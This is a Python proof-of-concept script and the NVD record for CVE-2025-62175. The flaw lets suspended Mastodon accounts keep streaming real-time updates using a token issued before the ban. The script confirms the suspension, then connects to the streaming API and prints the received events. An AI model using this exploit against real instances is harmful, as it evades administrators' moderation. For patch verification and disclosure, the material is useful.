CVE-2025-62175

# CVE-2025-62175 PoC - Mastodon Streaming API Access Control Bypass # This PoC demonstrates that disabled/suspended accounts can still # connect to the Streaming API after being banned. import websocket import requests import json import time # Configuration MASTODON_INSTANCE = "https://your-mastodon-instance.com" ACCESS_TOKEN = "YOUR_ACCESS_TOKEN_BEFORE_BAN" # Token obtained before account suspension def connect_to_streaming_api(): """ Connect to Mastodon Streaming API using a token from a disabled/suspended account. Expected behavior: Connection should be rejected after account suspension. Actual behavior (vulnerable): Connection succeeds and receives real-time updates. """ ws_url = f"wss://{MASTODON_INSTANCE.replace('https://', '')}/api/v1/streaming/?stream=user" headers = { "Authorization": f"Bearer {ACCESS_TOKEN}" } try: ws = websocket.create_connection(ws_url, header=headers) print("[+] Successfully connected to Streaming API with suspended account token!") print("[+] This indicates CVE-2025-62175 vulnerability is present.") # Listen for incoming messages for a few seconds ws.settimeout(10) while True: try: message = ws.recv() data = json.loads(message) print(f"[+] Received stream event: {data}") except websocket.WebSocketTimeoutException: print("[*] No more events received within timeout.") break ws.close() return True except websocket.WebSocketBadStatusException as e: print(f"[-] Connection rejected (expected on patched versions): {e}") return False except Exception as e: print(f"[-] Error: {e}") return False def verify_account_status(): """Check if the account is suspended or disabled via REST API.""" headers = {"Authorization": f"Bearer {ACCESS_TOKEN}"} response = requests.get(f"{MASTODON_INSTANCE}/api/v1/accounts/verify_credentials", headers=headers) if response.status_code == 403: print("[+] Account is confirmed suspended/disabled via REST API.") return True elif response.status_code == 200: print("[!] Account is still active.") return False else: print(f"[?] Unexpected status: {response.status_code}") return None if __name__ == "__main__": print("=" * 60) print("CVE-2025-62175 - Mastodon Streaming API Bypass PoC") print("=" * 60) # Step 1: Verify account is suspended via REST API is_suspended = verify_account_status() if is_suspended: # Step 2: Attempt to connect to Streaming API (should fail on patched versions) print("\n[*] Attempting Streaming API connection with suspended token...") result = connect_to_streaming_api() if result: print("\n[!] VULNERABLE: Streaming API connection succeeded despite account suspension!") else: print("\n[+] NOT VULNERABLE: Streaming API correctly rejected the connection.") else: print("\n[*] Account is not suspended. Suspend the account first to test.")

{"cve": {"id": "CVE-2025-62175", "sourceIdentifier": "[email protected]", "published": "2025-10-13T21:15:34.930", "lastModified": "2025-10-20T17:19:58.210", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mastodon is a free, open-source social network server based on ActivityPub. In versions before 4.4.6, 4.3.14, and 4.2.27, disabling or suspending a user account does not disconnect the account from the streaming API. This allows disabled or suspended accounts to continue receiving real-time updates through existing streaming connections and to establish new streaming connections, even though they cannot interact with other API endpoints. This undermines moderation actions, as administrators expect disabled or suspended accounts to be fully disconnected from the service. This issue has been patched in versions 4.4.6, 4.3.14, and 4.2.27. No known workarounds exist."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-273"}, {"lang": "en", "value": "CWE-274"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.2.27", "matchCriteriaId": "5AFD1281-DEE1-421D-B62B-8D9727428763"}, {"vulnerable": true, "criteria": "cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.3.0", "versionEndExcluding": "4.3.14", "matchCriteriaId": "CE867F92-59FF-4768-974B-D4BDF71B1FFA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.4.0", "versionEndExcluding": "4.4.6", "matchCriteriaId": "6F6F2EB3-8C86-417E-8D7B-499438B63D61"}]}]}], "references": [{"url": "https://github.com/mastodon/mastodon/commit/2971ac9863b91372e68ac152caf6f4dbff511d17", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/mastodon/mastodon/security/advisories/GHSA-r2fh-jr9c-9pxh", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}